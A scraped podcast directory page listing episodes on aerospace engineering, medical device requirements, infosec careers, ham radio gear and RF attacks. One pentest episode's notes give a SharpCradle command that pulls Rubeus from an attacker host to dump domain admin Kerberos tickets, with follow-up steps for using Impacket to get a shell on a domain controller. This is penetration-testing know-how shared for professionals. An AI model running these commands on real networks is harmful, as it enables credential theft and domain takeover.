Ep.10 | NASA Astronaut Matthew Dominick on Critical Engineering in Aerospace Technology
49 min

This week in Moore's Lobby, our guest is Matthew Dominick—EE, Navy test pilot, and astronaut for NASA.

You'll hear Matthew and Dave hit on a slew of topics. What's the ultimate "double E airplane"? What makes touchscreen vs. button interface design so incredibly important in the cockpit of a fighter jet? What is WOM and why do we rely on it so much for education? And what makes Matthew describe part of his job as being a "translator"?

This episode delves into the complexities of moving towards RF-enabled devices, Matthew's "weird hobby" of writing software, the role of augmented reality in the coolest of wearables (i.e., fighter pilot helmets), and the challenges facing engineers designing technologies meant to function on the surface of the moon.

Also, toasters. (No, really. There's a surprising amount of talk about toasters.)

Global Medical Device Podcast powered by Greenlight Guru
Global Medical Device Podcast powered by Greenlight Guru
Greenlight Guru's Jon Speer + Medical Device Quality Regulatory Leaders, Entrepreneurs, Consultants, R&D Engineers
Are you Spending Enough Time Defining and Managing Requirements for your Medical Device?
Some sources claim that one-third of your product development project should be spent on defining good requirements. Why? Requirements are key determinants of success for any new product that’s being developed, especially a medical device. In this episode of the Global Medical Device Podcast, Jon Speer talks to Devin Mack, mechanical engineer and owner of Enqual, about the importance of spending enough time defining and managing requirements for medical devices. Some of the highlights of the show include: Story Behind Business Name: Enqual is a combination of Devin’s background in engineering plus quality to provide a balance between both. A picture (or graph and diagram) is worth a 1,000 words to describe product development and design controls for medical devices. A challenge that medical device companies tend to miss is the establishment of well-defined requirements during the product development process. Best Practices: Open communication between internal and external customers and the product development team as well as cross-functional involvement to define good requirements early in the process. Potential Pitfalls: What if stakeholders, engineers, and end users are not adequately considered in the development process? Everyone needs to voice their opinion to meet end user satisfaction and create a competitive edge to achieve goals. Stop Light, Agile, or Six Sigma Methodology? Track team’s progress versus focusing on customer specifications. Constantly evaluate where you are with respect to your requirements. Mantra: Invest time and money in useability/engineering models to get it right the first time to prove indications and meet proper requirements.
36 min
Getting Into Infosec
Getting Into Infosec
Ayman Elsawah (@coffeewithayman)
Lisa Jiggetts - From Navy Cook To Pentester To Non-Profit Founder!
Lisa Jiggetts knew from an early age that she was going to be in tech an cyber. A navy veteren who started off as a cook, she always found herself gravitating towards technology. She is also the Founder & Board of Director of Women’s Society of Cyberjutsu, a non-profit that is dedicated to increasing the opportunities and advancement for women in cybersecurity. Checkout her journey into the cybersecurity field.Notes * Originally a cook in the military, then migrated to information security. * Looked for opportunities to transition into information security by talking to people in and outside her social network. * Networking can be hard, but it will turn in your favor. * Lisa is an introvert, but know how to become an extrovert when needed.Quotes * "When you're starting out, you don't necessarily get into the area you want to be in—you got to work your way up." * “That's the biggest thing you can do. I think is networking because somebody knows somebody" * "So I got all these certifications… I read a book and pass. What is it to me personally? That didn't tell me, you know, how to do anything. They get you in the door" * "[Networking is] hard, but, just do it because in the end, it's gonna turn out in your favor."Links * Lisa on Twitter: https://twitter.com/lisajiggetts * Intro Music: https://trash80.com/#/content/133/weeklybeats-2012-week5 * Women’s Society of Cyberjutsu : https://womenscyberjutsu.org/Getting Into Infosec * Breaking IN: A Practical Guide to Starting a Career in Information Security: https://www.amazon.com/dp/B07N15GTPC/ * T-Shirts, Mugs, and more: https://gettingintoinfosec.com/shop/ * Stay in touch and sign up for sneak peaks, updates, and commentary: https://pages.gettingintoinfosec.com/subscribe * Ayman on Twitter: https://twitter.com/coffeewithayman
42 min
7 Minute Security
7 Minute Security
Brian Johnson
7MS #442: Tales of Internal Network Pentest Pwnage - Part 23
Hey friends, I dare declare this to be my favorite tale of internal pentest pwnage so far. Why? Because the episode features: * Great blue team tools alerting our customer to a lot of the stuff we were doing * An EDR that we tried to beat up (but it beat us up instead) * SharpGPOAbuse which we talked about extensively last week * Separation of "everyday" accounts from privileged accounts * Multi-factor authentication bypass! * Some delicious findings in GPOs thanks to Ryan Hausec's great two part series (1 and 2). If you're not sure if you're vulnerable to MS14-025, check out this great article which discusses the vulnerability and its mitigation. The final cherry on top was a new attack another pentester taught me. Use a combination of SharpCradle and Rubeus to steal logged in DA creds: SharpCradle.exe -w https://your.kali.box.ip/Rubeus.exe dump /service:krbtgt /nowrap This will give you a TGT (base64 encoded) for active logon sessions to the box. So if a DA is logged in, you can snag their TGT and then convert that into a .kirbi file on your Kali box with: echo "LooooonnnnnggggggTicketStriiiiiiiiiiinnnngggg" | base64 -d > BobTheDomainAdmin.kirb Convert the .kirbi file to a .ccache file with ticket converter. Then you can use Impacket tools to use/abuse that access to your heart's delight. We ended up using Impacket to pop a shell on a DC and add a low-priv account to DA. The interesting thing is that the alert the blue team received essentially said "The DC itself added the user to the DA group" - the alert did not have attribution to the user whose ticket we stole! Good tip for future pentests!
1 hr 9 min
Ham Radio Workbench Podcast
Ham Radio Workbench Podcast
Ham Radio Workbench
HRWB116-2020 Gift Guide
Rod, Mike, George, and Jeremy discuss gift ideas for the ham in your life as well as what 2020 has inspired them to carry into 2021. PERMALINK - https://www.hamradioworkbench.com/podcast/2020-gift-guide Our Website - http://www.hamradioworkbench.com/ Follow us on Twitter - https://twitter.com/hamworkbench Contact us - http://hamradioworkbench.com/contact Connect with us on Facebook - https://www.facebook.com/groups/hamradioworkbench/ BrandMeister Talkgroup 31075 - https://hose.brandmeister.network/group/31075/ Raspberry Pi PiServer - https://www.raspberrypi.org/blog/piserver/ Transcend MLC High Endurance SD Cards - https://www.amazon.com/Transcend-Information-Micro-Adapter-TS32GUSDHC10V/dp/B01BDKTQY6 MacLoggerDX - https://www.dogparksoftware.com/MacLoggerDX.html Wizkers Radio - http://www.wizkers.io/wizkersradio Nano VNA video Andreas HB9BLA https://www.youtube.com/watch?v=_pjcEKQY_Tk&vl=en George’s Blog - https://www.hamradioworkbench.com/george-kj6vus-blog.html RigExpert Antenna Analyzers - https://rigexpert.com/ LP-100A http://www.telepostinc.com/lp100.html Array Solutions Power-Master II - https://www.arraysolutions.com/test-equipment/pm2-3k-so Heil Parametric Receive Audio System (And Speaker) - https://heilhamradio.com/products/parametric-receive-audio-system/ Hakko FR-301 desoldering gun - https://www.amazon.com/American-HAKKO-Products-FR301-03-Desoldering/dp/B07BFVFMS9/ref=sr_1_1?dchild=1&keywords=hakko+301&qid=1605322409&sr=8-1 Hakko FX888-D Soldering Station - https://www.amazon.com/Hakko-FX888D-23BY-Digital-Soldering-Station/dp/B00ANZRT4M/ref=sr_1_3?dchild=1&keywords=hakko+808&qid=1605322513&sr=8-3 Knipex - https://www.knipex.com/en/home/ Wiha - https://www.wihatools.com/ Wera - https://www-de.wera.de/en/ iFixIt Screw Driver Manta Kit - https://www.amazon.com/iFixit-Manta-Driver-Kit-Piece/dp/B07BMM74FD/ref=sr_1_5?dchild=1&keywords=ifixit&qid=1605321900&sr=8-5 Wera Metric Driver Set - https://www.amazon.com/gp/product/B00I8MYMT2/ref=ox_sc_saved_title_5?smid=ATVPDKIKX0DER&psc=1 Wera Imperial Derive Set - https://www.amazon.com/gp/product/B016NC7NN0/ref=ox_sc_saved_title_6?smid=ATVPDKIKX0DER&psc=1 Raspberry Pi 400 - https://www.raspberrypi.org/products/raspberry-pi-400/?resellerType=home Fluke 101 DMM - https://www.amazon.com/Fluke-101-Multimeter-Resistance-Capacitance/dp/B00HE6MIJY/ref=sr_1_2?dchild=1&keywords=fluke+101&qid=1605572864&sr=8-2 Tekpower TP3016M Portable Handheld Variable DC Power Supply - https://www.amazon.com/Tekpower-TP3016M-Portable-Handheld-Variable/dp/B015OA1J82/ref=sr_1_3?dchild=1&keywords=variable+power+supply+12v+portable+electronics&qid=1605313439&sr=8-3 USB Power Supply - https://www.amazon.com/Monoprice-Obsidian-Smart-Charger-113914/dp/B0198QDMIS/ref=sr_1_1?crid=1QNUZJJPZP7T3&dchild=1&keywords=monoprice+obsidian+plus+usb+desktop+charger&qid=1605324760&sprefix=monoprice+obsi%2Caps%2C175&sr=8-1 4 Port USB power supply https://www.monoprice.com/product?p_id=16242 Veto Pro Pac MB-MC - https://vetopropac.com/mb-mc-tool-bag-rubber-base/ National Suicide Prevention Helpline - https://suicidepreventionlifeline.org/ National Treatment Referral Hotline - https://www.samhsa.gov/find-help/national-helpline#:~:text=SAMHSA's%20National%20Helpline%20%E2%80%93%201%2D800,%2D662%2DHELP%20(4357) Veteran’s Crisis Line - https://www.veteranscrisisline.net/
2 hr 45 min
Brakeing Down Security Podcast
Brakeing Down Security Podcast
Bryan Brake, Amanda Berlin, Brian Boettcher
2020-043-Software_Defined_Radio-Sebastien_dudek-RF-attacks- IoT and car RF attacks
Sébastien Dudek - @FlUxIuS @penthertz Why we are here today? Software Defined Radio (sdr-radio.com) What kind of hardware or software do you need? Why would a security professional want to know how to use SDR tools and attacks? What other kinds of attacks can be launched? (I mean, other than replay type attacks) Door systems (badge systems) NFC? Contactless credit card attacks Smart building/home control systems Bluetooth attacks Point Of Sale systems Cellular radio 3g/4g/5g Industrial control systems Home appliances Medical telemetry systems Drones! LoRa - Wikipedia DASH7 - Wikipedia - custom TCP stack for LoRa Vehicle-to-grid - Wikipedia (V2G) Automatic Wireless Protocol Reverse Engineering | USENIX Hunting mobile devices endpoints - the RF and the Hard way | Synacktiv - Sébastien Dudek How Can Drones Be Hacked? The updated list of vulnerable drones & attack tools | by Sander Walters | Medium Carrier Aggregation explained (3gpp.org) Mobile phone jammer - Wikipedia World’s top hackers meet at the first 5G Cyber Security Hackathon - Security Boulevard Supply chain attacks - systems tend to use wireless chipsets or protocols LTE-torpedo-NDSS19.pdf (uiowa.edu) -privacy attacks on 4g/5g networks using side channel information How does someone make a faraday cage on the cheap? (mentioned in one of your class agendas) Lots of IoT devices use your typical home wifi connection, can’t you just sniff packets to get what you need? Replay attacks on car fobs: Jam and Replay Attacks on Vehicular Keyless Entry Systems (s34s0n.github.io) Attacks on Tesla wireless entry: Tesla’s keyless entry vulnerable to spoofing attack, researchers find - The Verge Garage door opener attacks: How to Hack a Garage Door in Under 10 Seconds and What You Can Do About It - ITS Tactical Kid’s toy opens garage doors: This Hacked Kids' Toy Opens Garage Doors in Seconds | WIRED What are the current limitations to testing wireless and RF related systems? What about custom wireless implementations? Cellular? Zigbee? I’m a wireless manufacturer of some kind of device. I’m freaked now by hearing you talk about how easy it is to attack wireless systems. What are some things I could do to ensure that the types of attacks we discussed here cannot affect me? Wireless defense system? https://www.researchgate.net/publication/321491751_Security_Mechanisms_to_Defend_against_New_Attacks_on_Software-Defined_Radio List of SDR software: The BIG List of RTL-SDR Supported Software (rtl-sdr.com)
32 min
Ham Radio Crash Course
Ham Radio Crash Course
Josh Nass KI6NAZ
When Should You DIY And When Should You Buy?
When is the right to build your own gear? Want to know how to improve your radio output audio on the cheap? And Leah continues her journey to the ham radio technician license exam! Today on the Ham Radio Cracsh Course Podcast! Thanks for listening! Want to give use a review? Hit us up on iTunes. We appreciate it! https://podcasts.apple.com/us/podcast/ham-radio-crash-course/id1400794852 Ham Radio Crash Course Merch: http://www.hamtactical.com Getting started in ham radio: https://youtu.be/bSF-q_qaqqg Monthly newsletter, stickers, private content:https://www.patreon.com/hoshnasi Links to products in the video: https://www.amazon.com/shop/hamradiocrashcourseAs an Amazon Associate I earn from qualifying purchases. Current Shack Config:ICOM 7300: https://amzn.to/2sVdpOqSteppIR 3E Yagi: https://consumer.steppir.com/shop/horizontal-antennas/3-element-antenna-products/3-element-yagi-antenna-with-30-40-loop-dipole-adder/ICOM 2730a: https://amzn.to/2JqrASgMFJ-4230DMP: http://www.mfjenterprises.com/Product.php?productid=MFJ-4230DMP Podcast...................► https://www.podbean.com/site/search/index?v=ham+radio+crash+courseDiscord.....................► https://discord.gg/xhJMxDTFacebook.................►https://goo.gl/cv5rEQTwitter......................► https://twitter.com/HoshnasiInstagram.................► https://instagram.com/hoshnasiSnapChat..................► @Hoshnasi Music by, Sonic D:Soundcloud.com/sncd Twitter.com/sncdFacebook.com/djsonicd Companies can send demo products to: Josh Nass P.O Box 5101 Cerritos, Ca. 90703-5101
1 hr 47 min
More episodes
Search
Clear search
Close search
Google apps
Main menu